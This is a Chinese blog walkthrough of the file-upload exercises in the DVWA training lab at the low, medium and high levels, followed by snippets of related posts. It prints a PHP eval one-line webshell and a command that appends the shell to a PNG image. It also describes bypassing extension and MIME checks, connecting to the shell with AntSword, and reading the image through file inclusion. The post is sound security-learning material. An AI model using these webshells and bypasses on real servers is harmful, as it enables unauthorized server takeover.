【文件上传】DVWA文件上传攻略

已于 2023-11-20 13:58:01 修改
阅读量499 收藏 6
点赞数 1
分类专栏: 文件上传 dvwa靶场 文章标签: android
于 2023-11-17 14:31:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134438374
版权

DVWA文件上传攻略

Low(初级)

1.上传文件

2.创建一个一句话木马

创建 xx.php 文件

<?php @eval($_REQUEST[777]);phpinfo()?>

3.上传一句话木马

4.上传成功

5.拿到路径,连接中国蚁剑

../../hackable/uploads/2.php

6.连接成功

7.分析源码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

        我们通过源码可以看到对于文件上传没有做任何过滤,允许所有文件进行上传.所有我们使用一句话木马,配合中国蚁剑就能成功拿到权限.

Medium(中级)

1.上传文件

2.尝试一句话木马

发现失败

3.我们尝试图片木马

        准备一张图片和一句话木马

使用命令

copy hh.png/b+2.php/a shell.php

上传成功

或者上传图片抓包.将一句话木马写到图片后面

4.修改后缀

我们要修改图片后缀为php,(因为要和中国蚁连接)放包.

也成功

5.中国蚁剑连接

../../hackable/uploads/shell.php

6.连接成功

7.源码分析

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

         通过源码分析我们可以看到,他对上传的文件类型进行过滤,只允许image/jpeg和image/png文件上传,否则不成功,但是他没有审核内容,所以我们使用图片木马轻松绕过,配合中国蚁剑拿到权限.

High(高级)(不推荐看我的)

1.文件上传

尝试上传一句话木马失败了.

上传图片木马成功了.

 2.测试

          a,抓包进行改后缀

        发现上传失败

        b.使用双后缀

        发现也失败了

        c.使用00截断

也不成功

3.文件包含读取 

但是我们已经将木马图片上传成功,所以尝试使用文件包含

 这里使用的是文件包含的初级读取图片信息,所以能够解析到图片信息

DVWA--file upload (文件上传
weixin_50342860的博客
08-23 1516
目录风险lowmediumhigh总结 风险 对上传的文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA靶机通关攻略第五关——文件上传
小飞飞的博客
03-11 998
DVWA靶机文件上传详细教学
DVWA 文件上传通关攻略
xy_wjyjw的博客
11-16 236
在C:\Windows\System32\cmd.exe这个路径中打开cmd。点击File Upload——直接上传一句话木马(yjh.php)点击File Upload——直接上传一句话木马(yjh.php)点击上传,发现只能上传jpg或png的格式。查看图片木马,在文件的最后又一个一句话木马。将一句话木马的后缀名改为jpg,点击上传。发现解析不到木马,只能解析到图片。找到一张图片,发现可以上传成功。DVWA 文件上传通关攻略。输入上传成功图片的地址。用蚁剑连接,上传成功。用蚁剑连接,上传成功。
DVWA】——File Upload(文件上传
最新发布
HinsCoder的博客
09-15 691
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA文件上传high级文件上传漏洞
热门推荐
IT1995的博客
03-11 1万+
1.制作“内涵图”:图和文本如下图所示:先看看1.jpg的二进制文件:下面执行如下cmd命令b指binarya指append(猜的,此处不太确定,但感觉有很有道理)下面打开2.jpg看看此时进入DVWA上传进行正常访问:设置成如下:下面进行畸形访问:最后如下图:(注意hackbar里面的Post data)...
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 6006
一、File Upload(文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA通关攻略文件上传
hongji728696的博客
09-04 993
文件上传漏洞原理:服务器端没有对文件上传进行严格的过滤,导致上传的文件可以被解析成可执行的脚本文件,获取服务器端的shell对服务器进行控制,以达到攻击目的。
Dvwa文件上传全级别学习笔记
Mbys_Lettuce的博客
09-21 1672
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。本次实验目标为利用上传的木马文件,获取目标服务器的权限,木马文件内容为:
DVWA文件上传
qq_62078839的博客
04-03 3685
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA文件上传漏洞
sunshine1_0的博客
01-20 1804
文件上传漏洞 低级别 中等级别 高级别
dvwa文件上传低中高通关教程
m0_65150886的博客
08-31 92
在php代码前加上GIF89(图片。通过bp抓包对文件后缀进行修改。
DVWA文件上传低中高级
weixin_48182463的博客
08-31 531
低级是可以直接上传php文件或者图片马的,中级是需要bp抓包,修改数据来绕过上传的限制,高级也是需要绕过文件上传的限制,修改jsp文件码的请求头让后端识别图片。
DVWA--文件上传(初中高)
firecjh的博客
06-10 2424
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。进入DVWA平台,选择DVWA Security,将安全级别设置为High。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置。
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 1734
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
DVWA靶场之文件上传(三个等级)
m0_55854679的博客
05-02 9973
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木马(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面中获
DVWA篇_文件上传
求大佬师傅带
05-25 1706
记一次DVWA文件上传漏洞复现
DVWA-文件上传(File Upload)
weixin_58954236的博客
08-20 860
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4434
DVWA文件上传
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 1790
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值